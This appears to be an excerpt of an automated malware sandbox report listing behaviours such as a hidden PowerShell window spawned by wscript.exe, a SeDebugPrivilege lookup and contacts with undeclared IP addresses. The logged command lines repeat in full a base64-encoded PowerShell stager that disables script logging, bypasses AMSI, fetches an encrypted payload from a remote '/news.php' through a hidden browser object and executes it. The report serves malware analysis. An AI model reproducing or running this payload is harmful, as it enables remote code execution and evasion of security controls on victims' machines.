AGMAawBMAG8AZwBnAGkAbgBnACcALAAwACkAOwAkAFYAYQBsAC4AQQBkAEQAKAAnAEUAbgBhAGIAbABlAFMAYwByAGkAcAB0AEIAbABvAGMAawBJAG4AdgBvAGMAYQB0AGkAbwBuAEwAbwBnAGcAaQBuAGcAJwAsADAAKQA7ACQAOABmAGEAMQBiAFsAJwBIAEsARQBZAF8ATABPAEMAQQBMAF8ATQBBAEMASABJAE4ARQBcAFMAbwBmAHQAdwBhAHIAZQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAFAAbwB3AGUAcgBTAGgAZQBsAGwAXABTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0APQAkAFYAQQBMAH0ARQBMAFMARQB7AFsAUwBDAFIAaQBwAFQAQgBsAG8AQwBLAF0ALgAiAEcARQB0AEYAaQBlAGAATABEACIAKAAnAHMAaQBnAG4AYQB0AHUAcgBlAHMAJwAsACcATgAnACsAJwBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBTAGUAVABWAGEATABVAEUAKAAkAG4AdQBsAEwALAAoAE4AZQBXAC0ATwBCAEoARQBDAFQAIABDAG8ATABMAEUAQwBUAEkAbwBOAFMALgBHAEUATgBlAHIASQBDAC4ASABhAFMAaABTAEUAdABbAFMAVABSAEkAbgBnAF0AKQApAH0AJABSAEUAZgA9AFsAUgBFAEYAXQAuAEEAcwBzAGUATQBCAEwAeQAuAEcARQB0AFQAWQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBBAG0AcwBpACcAKwAnAFUAdABpAGwAcwAnACkAOwAkAFIARQBGAC4ARwBlAHQARgBJAEUATABEACgAJwBhAG0AcwBpAEkAbgBpAHQARgAnACsAJwBhAGkAbABlAGQAJwAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBTAEUAVABWAGEAbABVAGUAKAAkAE4AdQBsAGwALAAkAFQAcgBVAEUAKQA7AH0AOwBbAFMAeQBzAFQAZQBtAC4ATgBlAFQALgBTAEUAcgB2AEkAYwBFAFAATwBpAG4AVABNAEEAbgBBAEcARQByAF0AOgA6AEUAeABwAGUAYwB0ADEAMAAwAEMATwBuAHQASQBOAHUARQA9ADAAOwAkADEAYQA5ADMAMAA9AFsAUwBZAHMAdABlAG0ALgBUAGUAWAB0AC4ARQBuAGMATwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQBUAEIAWQB0AGUAUwAoACcAZAA0ACwAMABnAGsAQABbAFAAKgAhAC8AZgBzAHQAYQA6AGIANwBRAEIAaABsAFUARAByADYAeABFAF0AMwBfACcAKQA7ACQAUgA9AHsAJABEACwAJAAxAEEAOQAzADAAPQAkAEEAUgBnAHMAOwAkAFMAPQAwAC4ALgAyADUANQA7ADAALgAuADIANQA1AHwAJQB7ACQASgA9ACgAJABKACsAJABTAFsAJABfAF0AKwAkADEAQQA5ADMAMABbACQAXwAlACQAMQBBADkAMwAwAC4AQwBvAHUATgB0AF0AKQAlADIANQA2ADsAJABTAFsAJABfAF0ALAAkAFMAWwAkAEoAXQA9ACQAUwBbACQASgBdACwAJABTAFsAJABfAF0AfQA7ACQARAB8ACUAewAkAEkAPQAoACQASQArADEAKQAlADIANQA2ADsAJABIAD0AKAAkAEgAKwAkAFMAWwAkAEkAXQApACUAMgA1ADYAOwAkAFMAWwAkAEkAXQAsACQAUwBbACQASABdAD0AJABTAFsAJABIAF0ALAAkAFMAWwAkAEkAXQA7ACQAXwAtAEIAeABPAFIAJABTAFsAKAAkAFMAWwAkAEkAXQArACQAUwBbACQASABdACkAJQAyADUANgBdAH0AfQA7ACQAaQBlAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AQwBPAE0AIABJAG4AdABlAHIAbgBlAHQARQB4AHAAbABvAHIAZQByAC4AQQBwAHAAbABpAGMAYQB0AGkAbwBuADsAJABpAGUALgBTAGkAbABlAG4AdAA9ACQAVAByAHUAZQA7ACQAaQBlAC4AdgBpAHMAaQBiAGwAZQA9ACQARgBhAGwAcwBlADsAJABmAGwAPQAxADQAOwAkAHMAZQByAD0AJAAoAFsAVABlAFgAVAAuAEUAbgBDAE8ARABpAE4AZwBdADoAOgBVAG4AaQBDAG8ARABlAC4ARwBFAHQAUwBUAFIAaQBuAEcAKABbAEMAbwBOAHYARQByAHQAXQA6ADoARgBSAE8AbQBCAEEAUwBlADYANABTAHQAUgBpAG4AZwAoACcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQA0AEEARABrAEEATABnAEEAeABBAEQAawBBAE4AdwBBAHUAQQBEAEUAQQBOAFEAQQAwAEEAQwA0AEEATQBRAEEAeABBAEQAWQBBAE8AZwBBADMAQQBEAGcAQQBNAFEAQQB3AEEAQQA9AD0AJwApACkAKQA7ACQAdAA9ACcALwBuAGUAdwBzAC4AcABoAHAAJwA7ACQAYwA9ACIAQwBGAC0AUgBBAFkAOgAgAGIAJwBOAFAAMwA3AFoAUQBvADAAZgBTAFEAagBMAHkAQgBjAHUAVABmAE8AMAAxADEAdwB1ADYANAA9ACcAIgA7ACQAaQBlAC4AbgBhAHYAaQBnAGEAdABlADIAKAAkAHMAZQByACsAJAB0ACwAJABmAGwALAAwACwAJABOAHUAbABsACwAJABjACkAOwB3AGgAaQBsAGUAKAAkAGkAZQAuAGIAdQBzAHkAKQB7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0ATQBpAGwAbABpAHMAZQBjAG8AbgBkAHMAIAAxADAAMAB9ADsAJABoAHQAIAA9ACAAJABpAGUALgBkAG8AYwB1AG0AZQBuAHQALgBHAGUAdABUAHkAcABlACgAKQAuAEkAbgB2AG8AawBlAE0AZQBtAGIAZQByACgAJwBiAG8AZAB5ACcALAAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQgBpAG4AZABpAG4AZwBGAGwAYQBnAHMAXQA6ADoARwBlAHQAUAByAG8AcABlAHIAdAB5ACwAIAAkAE4AdQBsAGwALAAgACQAaQBlAC4AZABvAGMAdQBtAGUAbgB0ACwAIAAkAE4AdQBsAGwAKQAuAEkAbgBuAGUAcgBIAHQAbQBsADsAdAByAHkAIAB7ACQAZABhAHQAYQA9AFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAGgAdAApAH0AIABjAGEAdABjAGgAIAB7ACQATgB1AGwAbAB9ACQASQB2AD0AJABkAEEAdABBAFsAMAAuAC4AMwBdADsAJABkAGEAVABBAD0AJABkAGEAdABhAFsANAAuAC4AJABEAGEAVABBAC4AbABlAE4ARwB0AGgAXQA7AC0AagBvAEkAbgBbAEMAaABBAHIAWwBdAF0AKAAmACAAJABSACAAJABkAGEAVABBACAAKAAkAEkAVgArACQAMQBhADkAMwAwACkAKQAgAHwAIABJAEUAWAA=

A process created a hidden window (1 event)

Time & API	Arguments	Status	Return	Repeated
ShellExecuteExW Aug. 12, 2024, 11:19 a.m.	show_type: 0 filepath_r: powershell parameters: -noP -sta -w 1 -enc SQBmACgAJABQAFMAVgBlAFIAcwBJAG8AbgBUAGEAQgBMAGUALgBQAFMAVgBlAFIAcwBpAG8ATgAuAE0AYQBqAG8AUgAgAC0AZwBFACAAMwApAHsAJABCAGUAMgBFADMAPQBbAHIARQBGAF0ALgBBAFMAUwBlAE0AQgBsAFkALgBHAEUAVABUAFkAcABFACgAJwBTAHkAcwB0AGUAbQAuAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBBAHUAdABvAG0AYQB0AGkAbwBuAC4AVQB0AGkAbABzACcAKQAuACIARwBFAFQARgBpAGUAYABMAGQAIgAoACcAYwBhAGMAaABlAGQARwByAG8AdQBwAFAAbwBsAGkAYwB5AFMAZQB0AHQAaQBuAGcAcwAnACwAJwBOACcAKwAnAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQA7AEkAZgAoACQAQgBFADIARQAzACkAewAkADgARgBBADEAYgA9ACQAYgBlADIARQAzAC4ARwBlAHQAVgBhAEwAdQBFACgAJABuAHUATABsACkAOwBJAGYAKAAkADgAZgBhADEAQgBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdACkAewAkADgARgBhADEAYgBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0APQAwADsAJAA4AGYAYQAxAGIAWwAnAFMAYwByAGkAcAB0AEIAJwArACcAbABvAGMAawBMAG8AZwBnAGkAbgBnACcAXQBbACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgBsAG8AYwBrAEkAbgB2AG8AYwBhAHQAaQBvAG4ATABvAGcAZwBpAG4AZwAnAF0APQAwAH0AJABWAGEAbAA9AFsAQwBPAEwATABFAGMAVABpAG8ATgBTAC4ARwBFAE4AZQBSAGkAQwAuAEQAaQBDAFQAaQBvAG4AQQByAHkAWwBTAHQAcgBJAG4AZwAsAFMAWQBTAHQARQBNAC4ATwBCAGoARQBjAHQAXQBdADoAOgBuAEUAdwAoACkAOwAkAFYAYQBMAC4AQQBkAGQAKAAnAEUAbgBhAGIAbABlAFMAYwByAGkAcAB0AEIAJwArACcAbABvAGMAawBMAG8AZwBnAGkAbgBnACcALAAwACkAOwAkAFYAYQBsAC4AQQBkAEQAKAAnAEUAbgBhAGIAbABlAFMAYwByAGkAcAB0AEIAbABvAGMAawBJAG4AdgBvAGMAYQB0AGkAbwBuAEwAbwBnAGcAaQBuAGcAJwAsADAAKQA7ACQAOABmAGEAMQBiAFsAJwBIAEsARQBZAF8ATABPAEMAQQBMAF8ATQBBAEMASABJAE4ARQBcAFMAbwBmAHQAdwBhAHIAZQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAFAAbwB3AGUAcgBTAGgAZQBsAGwAXABTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0APQAkAFYAQQBMAH0ARQBMAFMARQB7AFsAUwBDAFIAaQBwAFQAQgBsAG8AQwBLAF0ALgAiAEcARQB0AEYAaQBlAGAATABEACIAKAAnAHMAaQBnAG4AYQB0AHUAcgBlAHMAJwAsACcATgAnACsAJwBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBTAGUAVABWAGEATABVAEUAKAAkAG4AdQBsAEwALAAoAE4AZQBXAC0ATwBCAEoARQBDAFQAIABDAG8ATABMAEUAQwBUAEkAbwBOAFMALgBHAEUATgBlAHIASQBDAC4ASABhAFMAaABTAEUAdABbAFMAVABSAEkAbgBnAF0AKQApAH0AJABSAEUAZgA9AFsAUgBFAEYAXQAuAEEAcwBzAGUATQBCAEwAeQAuAEcARQB0AFQAWQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBBAG0AcwBpACcAKwAnAFUAdABpAGwAcwAnACkAOwAkAFIARQBGAC4ARwBlAHQARgBJAEUATABEACgAJwBhAG0AcwBpAEkAbgBpAHQARgAnACsAJwBhAGkAbABlAGQAJwAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBTAEUAVABWAGEAbABVAGUAKAAkAE4AdQBsAGwALAAkAFQAcgBVAEUAKQA7AH0AOwBbAFMAeQBzAFQAZQBtAC4ATgBlAFQALgBTAEUAcgB2AEkAYwBFAFAATwBpAG4AVABNAEEAbgBBAEcARQByAF0AOgA6AEUAeABwAGUAYwB0ADEAMAAwAEMATwBuAHQASQBOAHUARQA9ADAAOwAkADEAYQA5ADMAMAA9AFsAUwBZAHMAdABlAG0ALgBUAGUAWAB0AC4ARQBuAGMATwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQBUAEIAWQB0AGUAUwAoACcAZAA0ACwAMABnAGsAQABbAFAAKgAhAC8AZgBzAHQAYQA6AGIANwBRAEIAaABsAFUARAByADYAeABFAF0AMwBfACcAKQA7ACQAUgA9AHsAJABEACwAJAAxAEEAOQAzADAAPQAkAEEAUgBnAHMAOwAkAFMAPQAwAC4ALgAyADUANQA7ADAALgAuADIANQA1AHwAJQB7ACQASgA9ACgAJABKACsAJABTAFsAJABfAF0AKwAkADEAQQA5ADMAMABbACQAXwAlACQAMQBBADkAMwAwAC4AQwBvAHUATgB0AF0AKQAlADIANQA2ADsAJABTAFsAJABfAF0ALAAkAFMAWwAkAEoAXQA9ACQAUwBbACQASgBdACwAJABTAFsAJABfAF0AfQA7ACQARAB8ACUAewAkAEkAPQAoACQASQArADEAKQAlADIANQA2ADsAJABIAD0AKAAkAEgAKwAkAFMAWwAkAEkAXQApACUAMgA1ADYAOwAkAFMAWwAkAEkAXQAsACQAUwBbACQASABdAD0AJABTAFsAJABIAF0ALAAkAFMAWwAkAEkAXQA7ACQAXwAtAEIAeABPAFIAJABTAFsAKAAkAFMAWwAkAEkAXQArACQAUwBbACQASABdACkAJQAyADUANgBdAH0AfQA7ACQAaQBlAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AQwBPAE0AIABJAG4AdABlAHIAbgBlAHQARQB4AHAAbABvAHIAZQByAC4AQQBwAHAAbABpAGMAYQB0AGkAbwBuADsAJABpAGUALgBTAGkAbABlAG4AdAA9ACQAVAByAHUAZQA7ACQAaQBlAC4AdgBpAHMAaQBiAGwAZQA9ACQARgBhAGwAcwBlADsAJABmAGwAPQAxADQAOwAkAHMAZQByAD0AJAAoAFsAVABlAFgAVAAuAEUAbgBDAE8ARABpAE4AZwBdADoAOgBVAG4AaQBDAG8ARABlAC4ARwBFAHQAUwBUAFIAaQBuAEcAKABbAEMAbwBOAHYARQByAHQAXQA6ADoARgBSAE8AbQBCAEEAUwBlADYANABTAHQAUgBpAG4AZwAoACcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQA0AEEARABrAEEATABnAEEAeABBAEQAawBBAE4AdwBBAHUAQQBEAEUAQQBOAFEAQQAwAEEAQwA0AEEATQBRAEEAeABBAEQAWQBBAE8AZwBBADMAQQBEAGcAQQBNAFEAQQB3AEEAQQA9AD0AJwApACkAKQA7ACQAdAA9ACcALwBuAGUAdwBzAC4AcABoAHAAJwA7ACQAYwA9ACIAQwBGAC0AUgBBAFkAOgAgAGIAJwBOAFAAMwA3AFoAUQBvADAAZgBTAFEAagBMAHkAQgBjAHUAVABmAE8AMAAxADEAdwB1ADYANAA9ACcAIgA7ACQAaQBlAC4AbgBhAHYAaQBnAGEAdABlADIAKAAkAHMAZQByACsAJAB0ACwAJABmAGwALAAwACwAJABOAHUAbABsACwAJABjACkAOwB3AGgAaQBsAGUAKAAkAGkAZQAuAGIAdQBzAHkAKQB7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0ATQBpAGwAbABpAHMAZQBjAG8AbgBkAHMAIAAxADAAMAB9ADsAJABoAHQAIAA9ACAAJABpAGUALgBkAG8AYwB1AG0AZQBuAHQALgBHAGUAdABUAHkAcABlACgAKQAuAEkAbgB2AG8AawBlAE0AZQBtAGIAZQByACgAJwBiAG8AZAB5ACcALAAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQgBpAG4AZABpAG4AZwBGAGwAYQBnAHMAXQA6ADoARwBlAHQAUAByAG8AcABlAHIAdAB5ACwAIAAkAE4AdQBsAGwALAAgACQAaQBlAC4AZABvAGMAdQBtAGUAbgB0ACwAIAAkAE4AdQBsAGwAKQAuAEkAbgBuAGUAcgBIAHQAbQBsADsAdAByAHkAIAB7ACQAZABhAHQAYQA9AFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAGgAdAApAH0AIABjAGEAdABjAGgAIAB7ACQATgB1AGwAbAB9ACQASQB2AD0AJABkAEEAdABBAFsAMAAuAC4AMwBdADsAJABkAGEAVABBAD0AJABkAGEAdABhAFsANAAuAC4AJABEAGEAVABBAC4AbABlAE4ARwB0AGgAXQA7AC0AagBvAEkAbgBbAEMAaABBAHIAWwBdAF0AKAAmACAAJABSACAAJABkAGEAVABBACAAKAAkAEkAVgArACQAMQBhADkAMwAwACkAKQAgAHwAIABJAEUAWAA= filepath: powershell	1	1	0

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW Aug. 12, 2024, 11:19 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Communicates with host for which no DNS query was performed (2 events)

host	117.18.232.200
host	89.197.154.116

One or more non-whitelisted processes were created (2 events)

parent_process	wscript.exe				martian_process	powershell -noP -sta -w 1 -enc SQBmACgAJABQAFMAVgBlAFIAcwBJAG8AbgBUAGEAQgBMAGUALgBQAFMAVgBlAFIAcwBpAG8ATgAuAE0AYQBqAG8AUgAgAC0AZwBFACAAMwApAHsAJABCAGUAMgBFADMAPQBbAHIARQBGAF0ALgBBAFMAUwBlAE0AQgBsAFkALgBHAEUAVABUAFkAcABFACgAJwBTAHkAcwB0AGUAbQAuAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBBAHUAdABvAG0AYQB0AGkAbwBuAC4AVQB0AGkAbABzACcAKQAuACIARwBFAFQARgBpAGUAYABMAGQAIgAoACcAYwBhAGMAaABlAGQARwByAG8AdQBwAFAAbwBsAGkAYwB5AFMAZQB0AHQAaQBuAGcAcwAnACwAJwBOACcAKwAnAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQA7AEkAZgAoACQAQgBFADIARQAzACkAewAkADgARgBBADEAYgA9ACQAYgBlADIARQAzAC4ARwBlAHQAVgBhAEwAdQBFACgAJABuAHUATABsACkAOwBJAGYAKAAkADgAZgBhADEAQgBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdACkAewAkADgARgBhADEAYgBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0APQAwADsAJAA4AGYAYQAxAGIAWwAnAFMAYwByAGkAcAB0AEIAJwArACcAbABvAGMAawBMAG8AZwBnAGkAbgBnACcAXQBbACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgBsAG8AYwBrAEkAbgB2AG8AYwBhAHQAaQBvAG4ATABvAGcAZwBpAG4AZwAnAF0APQAwAH0AJABWAGEAbAA9AFsAQwBPAEwATABFAGMAVABpAG8ATgBTAC4ARwBFAE4AZQBSAGkAQwAuAEQAaQBDAFQAaQBvAG4AQQByAHkAWwBTAHQAcgBJAG4AZwAsAFMAWQBTAHQARQBNAC4ATwBCAGoARQBjAHQAXQBdADoAOgBuAEUAdwAoACkAOwAkAFYAYQBMAC4AQQBkAGQAKAAnAEUAbgBhAGIAbABlAFMAYwByAGkAcAB0AEIAJwArACcAbABvAGMAawBMAG8AZwBnAGkAbgBnACcALAAwACkAOwAkAFYAYQBsAC4AQQBkAEQAKAAnAEUAbgBhAGIAbABlAFMAYwByAGkAcAB0AEIAbABvAGMAawBJAG4AdgBvAGMAYQB0AGkAbwBuAEwAbwBnAGcAaQBuAGcAJwAsADAAKQA7ACQAOABmAGEAMQBiAFsAJwBIAEsARQBZAF8ATABPAEMAQQBMAF8ATQBBAEMASABJAE4ARQBcAFMAbwBmAHQAdwBhAHIAZQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAFAAbwB3AGUAcgBTAGgAZQBsAGwAXABTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0APQAkAFYAQQBMAH0ARQBMAFMARQB7AFsAUwBDAFIAaQBwAFQAQgBsAG8AQwBLAF0ALgAiAEcARQB0AEYAaQBlAGAATABEACIAKAAnAHMAaQBnAG4AYQB0AHUAcgBlAHMAJwAsACcATgAnACsAJwBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBTAGUAVABWAGEATABVAEUAKAAkAG4AdQBsAEwALAAoAE4AZQBXAC0ATwBCAEoARQBDAFQAIABDAG8ATABMAEUAQwBUAEkAbwBOAFMALgBHAEUATgBlAHIASQBDAC4ASABhAFMAaABTAEUAdABbAFMAVABSAEkAbgBnAF0AKQApAH0AJABSAEUAZgA9AFsAUgBFAEYAXQAuAEEAcwBzAGUATQBCAEwAeQAuAEcARQB0AFQAWQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBBAG0AcwBpACcAKwAnAFUAdABpAGwAcwAnACkAOwAkAFIARQBGAC4ARwBlAHQARgBJAEUATABEACgAJwBhAG0AcwBpAEkAbgBpAHQARgAnACsAJwBhAGkAbABlAGQAJwAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBTAEUAVABWAGEAbABVAGUAKAAkAE4AdQBsAGwALAAkAFQAcgBVAEUAKQA7AH0AOwBbAFMAeQBzAFQAZQBtAC4ATgBlAFQALgBTAEUAcgB2AEkAYwBFAFAATwBpAG4AVABNAEEAbgBBAEcARQByAF0AOgA6AEUAeABwAGUAYwB0ADEAMAAwAEMATwBuAHQASQBOAHUARQA9ADAAOwAkADEAYQA5ADMAMAA9AFsAUwBZAHMAdABlAG0ALgBUAGUAWAB0AC4ARQBuAGMATwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQBUAEIAWQB0AGUAUwAoACcAZAA0ACwAMABnAGsAQABbAFAAKgAhAC8AZgBzAHQAYQA6AGIANwBRAEIAaABsAFUARAByADYAeABFAF0AMwBfACcAKQA7ACQAUgA9AHsAJABEACwAJAAxAEEAOQAzADAAPQAkAEEAUgBnAHMAOwAkAFMAPQAwAC4ALgAyADUANQA7ADAALgAuADIANQA1AHwAJQB7ACQASgA9ACgAJABKACsAJABTAFsAJABfAF0AKwAkADEAQQA5ADMAMABbACQAXwAlACQAMQBBADkAMwAwAC4AQwBvAHUATgB0AF0AKQAlADIANQA2ADsAJABTAFsAJABfAF0ALAAkAFMAWwAkAEoAXQA9ACQAUwBbACQASgBdACwAJABTAFsAJABfAF0AfQA7ACQARAB8ACUAewAkAEkAPQAoACQASQArADEAKQAlADIANQA2ADsAJABIAD0AKAAkAEgAKwAkAFMAWwAkAEkAXQApACUAMgA1ADYAOwAkAFMAWwAkAEkAXQAsACQAUwBbACQASABdAD0AJABTAFsAJABIAF0ALAAkAFMAWwAkAEkAXQA7ACQAXwAtAEIAeABPAFIAJABTAFsAKAAkAFMAWwAkAEkAXQArACQAUwBbACQASABdACkAJQAyADUANgBdAH0AfQA7ACQAaQBlAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AQwBPAE0AIABJAG4AdABlAHIAbgBlAHQARQB4AHAAbABvAHIAZQByAC4AQQBwAHAAbABpAGMAYQB0AGkAbwBuADsAJABpAGUALgBTAGkAbABlAG4AdAA9ACQAVAByAHUAZQA7ACQAaQBlAC4AdgBpAHMAaQBiAGwAZQA9ACQARgBhAGwAcwBlADsAJABmAGwAPQAxADQAOwAkAHMAZQByAD0AJAAoAFsAVABlAFgAVAAuAEUAbgBDAE8ARABpAE4AZwBdADoAOgBVAG4AaQBDAG8ARABlAC4ARwBFAHQAUwBUAFIAaQBuAEcAKABbAEMAbwBOAHYARQByAHQAXQA6ADoARgBSAE8AbQBCAEEAUwBlADYANABTAHQAUgBpAG4AZwAoACcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQA0AEEARABrAEEATABnAEEAeABBAEQAawBBAE4AdwBBAHUAQQBEAEUAQQBOAFEAQQAwAEEAQwA0AEEATQBRAEEAeABBAEQAWQBBAE8AZwBBADMAQQBEAGcAQQBNAFEAQQB3AEEAQQA9AD0AJwApACkAKQA7ACQAdAA9ACcALwBuAGUAdwBzAC4AcABoAHAAJwA7ACQAYwA9ACIAQwBGAC0AUgBBAFkAOgAgAGIAJwBOAFAAMwA3AFoAUQBvADAAZgBTAFEAagBMAHkAQgBjAHUAVABmAE8AMAAxADEAdwB1ADYANAA9ACcAIgA7ACQAaQBlAC4AbgBhAHYAaQBnAGEAdABlADIAKAAkAHMAZQByACsAJAB0ACwAJABmAGwALAAwACwAJABOAHUAbABsACwAJABjACkAOwB3AGgAaQBsAGUAKAAkAGkAZQAuAGIAdQBzAHkAKQB7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0ATQBpAGwAbABpAHMAZQBjAG8AbgBkAHMAIAAxADAAMAB9ADsAJABoAHQAIAA9ACAAJABpAGUALgBkAG8AYwB1AG0AZQBuAHQALgBHAGUAdABUAHkAcABlACgAKQAuAEkAbgB2AG8AawBlAE0AZQBtAGIAZQByACgAJwBiAG8AZAB5ACcALAAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQgBpAG4AZABpAG4AZwBGAGwAYQBnAHMAXQA6ADoARwBlAHQAUAByAG8AcABlAHIAdAB5ACwAIAAkAE4AdQBsAGwALAAgACQAaQBlAC4AZABvAGMAdQBtAGUAbgB0ACwAIAAkAE4AdQBsAGwAKQAuAEkAbgBuAGUAcgBIAHQAbQBsADsAdAByAHkAIAB7ACQAZABhAHQAYQA9AFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAGgAdAApAH0AIABjAGEAdABjAGgAIAB7ACQATgB1AGwAbAB9ACQASQB2AD0AJABkAEEAdABBAFsAMAAuAC4AMwBdADsAJABkAGEAVABBAD0AJABkAGEAdABhAFsANAAuAC4AJABEAGEAVABBAC4AbABlAE4ARwB0AGgAXQA7AC0AagBvAEkAbgBbAEMAaABBAHIAWwBdAF0AKAAmACAAJABSACAAJABkAGEAVABBACAAKAAkAEkAVgArACQAMQBhADkAMwAwACkAKQAgAHwAIABJAEUAWAA=
parent_process	wscript.exe				martian_process	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noP -sta -w 1 -enc SQBmACgAJABQAFMAVgBlAFIAcwBJAG8AbgBUAGEAQgBMAGUALgBQAFMAVgBlAFIAcwBpAG8ATgAuAE0AYQBqAG8AUgAgAC0AZwBFACAAMwApAHsAJABCAGUAMgBFADMAPQBbAHIARQBGAF0ALgBBAFMAUwBlAE0AQgBsAFkALgBHAEUAVABUAFkAcABFACgAJwBTAHkAcwB0AGUAbQAuAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBBAHUAdABvAG0AYQB0AGkAbwBuAC4AVQB0AGkAbABzACcAKQAuACIARwBFAFQARgBpAGUAYABMAGQAIgAoACcAYwBhAGMAaABlAGQARwByAG8AdQBwAFAAbwBsAGkAYwB5AFMAZQB0AHQAaQBuAGcAcwAnACwAJwBOACcAKwAnAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQA7AEkAZgAoACQAQgBFADIARQAzACkAewAkADgARgBBADEAYgA9ACQAYgBlADIARQAzAC4ARwBlAHQAVgBhAEwAdQBFACgAJABuAHUATABsACkAOwBJAGYAKAAkADgAZgBhADEAQgBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdACkAewAkADgARgBhADEAYgBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0APQAwADsAJAA4AGYAYQAxAGIAWwAnAFMAYwByAGkAcAB0AEIAJwArACcAbABvAGMAawBMAG8AZwBnAGkAbgBnACcAXQBbACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgBsAG8AYwBrAEkAbgB2AG8AYwBhAHQAaQBvAG4ATABvAGcAZwBpAG4AZwAnAF0APQAwAH0AJABWAGEAbAA9AFsAQwBPAEwATABFAGMAVABpAG8ATgBTAC4ARwBFAE4AZQBSAGkAQwAuAEQAaQBDAFQAaQBvAG4AQQByAHkAWwBTAHQAcgBJAG4AZwAsAFMAWQBTAHQARQBNAC4ATwBCAGoARQBjAHQAXQBdADoAOgBuAEUAdwAoACkAOwAkAFYAYQBMAC4AQQBkAGQAKAAnAEUAbgBhAGIAbABlAFMAYwByAGkAcAB0AEIAJwArACcAbABvAGMAawBMAG8AZwBnAGkAbgBnACcALAAwACkAOwAkAFYAYQBsAC4AQQBkAEQAKAAnA